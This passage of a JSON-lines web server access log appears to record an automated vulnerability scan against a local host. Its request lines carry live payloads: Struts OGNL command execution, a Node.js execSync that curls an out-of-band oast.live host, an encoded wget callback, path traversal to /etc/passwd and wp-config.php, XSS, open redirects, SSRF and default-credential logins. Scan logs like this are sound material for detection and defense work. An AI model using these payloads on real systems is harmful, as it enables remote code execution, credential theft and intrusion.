AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"127.0.0.1/maint/index.php?packages", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:19 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /index.php?v=d HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.289","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:19 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wabam/favicon.ico HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.293","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:19 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /https:///example.com@example.com/%2f%2e%2e HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.338","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:19 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /beans HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.352","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:19 +0000","request_body":"var oShell = WScript.CreateObject('WScript.Shell');var oExec = oShell.Exec(\x22cmd /c whoami\x22);","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"PUT /meta HTTP/1.1","status":"308","body_bytes_sents":"196","req_time":"0.357","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"PUT", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:19 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /dev/tests/functional/credentials.xml.dist HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.298","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:19 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /plugins/wordpress_sso/pages/index.php?wordpress_user=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.042","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:19 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /site_cg/application/configs/application.ini HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.266","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:19 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /docs HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.321","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:19 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /routes/error_log HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.322","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:19 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /api/v4/users/69 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.577","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:19 +0000","request_body":"csrfmiddlewaretoken={{csrfmiddlewaretoken}}&username=hadoop&password=hadoop&next=%2F","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /hue/accounts/login HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.332","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:19 +0000","request_body":"\x0D\x0A\x0D\x0A mt.handler_to_coderef\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A YHdnZXQgaHR0cDovL2M5b21zM2dzbXB2ZTFpanQwbWMwODd4bm5neGNjbmtyOS5vYXN0LmxpdmVg\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /cgi-bin/mt/mt-xmlrpc.cgi HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.416","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:19 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /client_secrets.json HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.327","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:19 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /shindig/gadgets/proxy?container=default&url=http://oast.pro HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.337","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:19 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /v2/auth/roles HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.696","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:19 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /slr/application/configs/application.ini HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.309","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:19 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /https://:80 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.419","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:19 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /config/error_log HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.355","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:19 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /actuator/beans HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.391","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:19 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /pacs/login.php?message=%3Cimg%20src=%22%22%20onerror=%22alert(1);%22%3E1%3C/img%3E HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.403","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:19 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /index.php?redirect=/\x5C/evil.com/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.413","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:19 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /crowd/console/login.action HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.050","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:19 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /Default.aspx?pid=Login HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.305","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:19 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.392","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:19 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /nacos/v1/cs/ops/derby?sql=select+st.tablename+from+sys.systables+st HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.835","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:19 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/aspose-cloud-ebook-generator/aspose_posts_exporter_download.php?file=../../../wp-config.php HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.370","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:19 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /settings.php.dist HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.151","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:19 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /index.action?redirectAction%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.181","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:19 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /https://:80?@example.com/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.262","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:19 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /dbaas_monitor/login HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.395","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:19 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /dfshealth.html HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.270","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:19 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /index.php?redirect=//evil.com HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.288","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:19 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /redoc HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.673","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:19 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /_profiler/empty/search/results?limit=10 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.168","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:19 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /XMII/Catalog?Mode=GetFileList&Path=Classes/../../../../../../../../../../../../etc/passwd HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.412","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:20 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /cucm-uds/users HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.297","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:20 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.298","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:20 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wp-config.php-backup HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.378","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:20 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /error_log HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.381","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:20 +0000","request_body":"test_data","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /analytics/telemetry/ph/api/hyper/send?_c&_i=test HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.325","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:20 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /v3/graphiql.css HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.167","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:20 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /etc.children.json/FNZ.ico HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.071","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:20 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /index.php?s=/install/index/index HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.318","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:20 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /httpd.conf HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.072","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:20 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.338","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"\x5Cx00", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:20 +0000","request_body":"csrfmiddlewaretoken={{csrfmiddlewaretoken}}&username=cloudera&password=cloudera&next=%2F","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /hue/accounts/login HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.784","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:20 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /mobile/error-not-supported-platform.html?desktop_url=javascript:alert(1337);//itms:// HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.413","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:20 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /openapi.json HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.272","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:20 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /%24%7B%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D@java.lang.Runtime@getRuntime%28%29.exec%28%27cat%20/etc/passwd%27%29.getInputStream%28%29%2C%23b%3Dnew%20java.io.InputStreamReader%28%23a%29%2C%23c%3Dnew%20%20java.io.BufferedReader%28%23b%29%2C%23d%3Dnew%20char%5B51020%5D%2C%23c.read%28%23d%29%2C%23sbtest%3D@org.apache.struts2.ServletActionContext@getResponse%28%29.getWriter%28%29%2C%23sbtest.println%28%23d%29%2C%23sbtest.close%28%29%29%7D/actionChain1.action HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.382","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:20 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /https://:@%5C@example.com HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.386","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:20 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /settings.php.old HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.436","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:20 +0000","request_body":"document=this.constructor.constructor(\x22return process\x22)().mainModule.require(\x22child_process\x22).execSync(\x22curl http://c9oms3gsmpve1ijt0mc0hsucb8j1z85u7.oast.live\x22)","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /checkValid HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.277","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:20 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /web/home.html HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.332","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:20 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /%2F..%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.363","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:20 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /ReportServer?op=fr_server&cmd=sc_getconnectioninfo HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.381","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:20 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /hopfully404 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.297","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:20 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /api/v4/users/70 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.035","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:20 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /errors_log HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.349","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:20 